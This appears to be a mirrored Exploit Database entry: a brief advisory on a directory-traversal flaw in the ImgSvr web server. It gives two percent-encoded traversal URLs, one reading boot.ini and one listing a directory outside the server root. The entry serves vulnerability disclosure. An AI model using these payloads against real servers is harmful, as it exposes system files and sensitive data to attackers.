bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/23909.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
618 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/10048/info
ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.
A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system.
To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Reference in a new issue View git blame Copy permalink